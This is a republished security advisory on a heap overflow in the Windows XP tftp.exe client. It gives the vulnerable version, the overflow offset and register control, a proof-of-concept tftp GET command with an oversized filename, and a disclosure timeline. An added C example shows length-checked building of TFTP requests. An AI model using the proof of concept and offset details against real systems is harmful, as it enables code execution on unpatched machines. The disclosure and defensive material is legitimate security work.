TFTP stands for Trivial File Transfer Protocol, a network application protocol that is simpler than the File Transfer Protocol (FTP) but less capable. TFTP is built on UDP.
The TFTP client provided with Windows XP (tftp.exe) is vulnerable to a locally exploitable heap overflow.
Credit:
The information has been provided by Dennis Rand.
The original article can be found at: http://www.cirt.dk/advisories/cirt-38-advisory.pdf
Vulnerable Systems:
* Windows XP - TFTP.EXE version 5.1.2600.0 (xpclient.010817-1148)
The Windows XP tftp.exe software is vulnerable to a heap-based overflow that allows arbitrary commands to be run on the system as the user who triggers the overflow. The EAX and ECX registers are controlled: after 1446 bytes of filler or payload, the next 8 bytes land in EAX and ECX.
Proof of concept:
tftp -i 127.0.0.1 GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
<snip>CCCCBBBB
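The defensive lesson is that an attacker-sized filename must be length-checked before it is copied into a fixed-size buffer. The following is an added illustration written for this page, not code from tftp.exe or from the advisory: a TFTP read-request (RRQ) builder that rejects any filename and mode that would not fit, and a check that a name of the advisory's 1446 + 8 byte size is refused. The 512-byte request bound (TFTP_MAX_REQ) is an assumption chosen for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define TFTP_MAX_REQ 512   /* assumed bound for a request datagram (example value) */
#define TFTP_OP_RRQ  1     /* opcode for a read request, i.e. a GET */

/* Build an RRQ packet: opcode (2 bytes, big-endian), filename, NUL, mode, NUL.
 * All lengths are checked before any byte is copied. Returns the packet
 * length on success, or -1 if the request would not fit in 'out'. */
int build_rrq(uint8_t *out, size_t outlen, const char *filename, const char *mode)
{
    size_t flen = strlen(filename), mlen = strlen(mode);
    size_t need = 2 + flen + 1 + mlen + 1;
    if (need > outlen || need > TFTP_MAX_REQ)
        return -1;                         /* reject instead of overflowing */
    out[0] = 0;
    out[1] = TFTP_OP_RRQ;
    memcpy(out + 2, filename, flen);
    out[2 + flen] = 0;
    memcpy(out + 3 + flen, mode, mlen);
    out[3 + flen + mlen] = 0;
    return (int)need;
}

/* Length of a normal request ("test.bin" in octet mode): 2+8+1+5+1 = 17. */
int example_rrq_len(void)
{
    uint8_t pkt[TFTP_MAX_REQ];
    return build_rrq(pkt, sizeof pkt, "test.bin", "octet");
}

/* Constructed input of the size the advisory describes (1446 filler bytes plus
 * 8 register-controlling bytes). Returns 1 if the builder refuses it. */
int oversized_name_rejected(void)
{
    char name[1446 + 8 + 1];
    memset(name, 'A', sizeof name - 1);
    name[sizeof name - 1] = 0;
    uint8_t pkt[TFTP_MAX_REQ];
    return build_rrq(pkt, sizeof pkt, name, "octet") == -1;
}

int main(void)
{
    printf("normal RRQ length: %d\n", example_rrq_len());
    printf("oversized name rejected: %d\n", oversized_name_rejected());
    return 0;
}
```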
Disclosure Timeline:
* 01.08.05 - Vulnerability discovered
* 15.08.05 - Research completed
* 19.08.05 - Vendor notified
* 19.08.05 - Security vulnerability tagged tftp [6167bgs] at Microsoft
* 08.09.05 - Microsoft responds with a timeframe for the fix - see Corrective actions
* 03.10.05 - Public release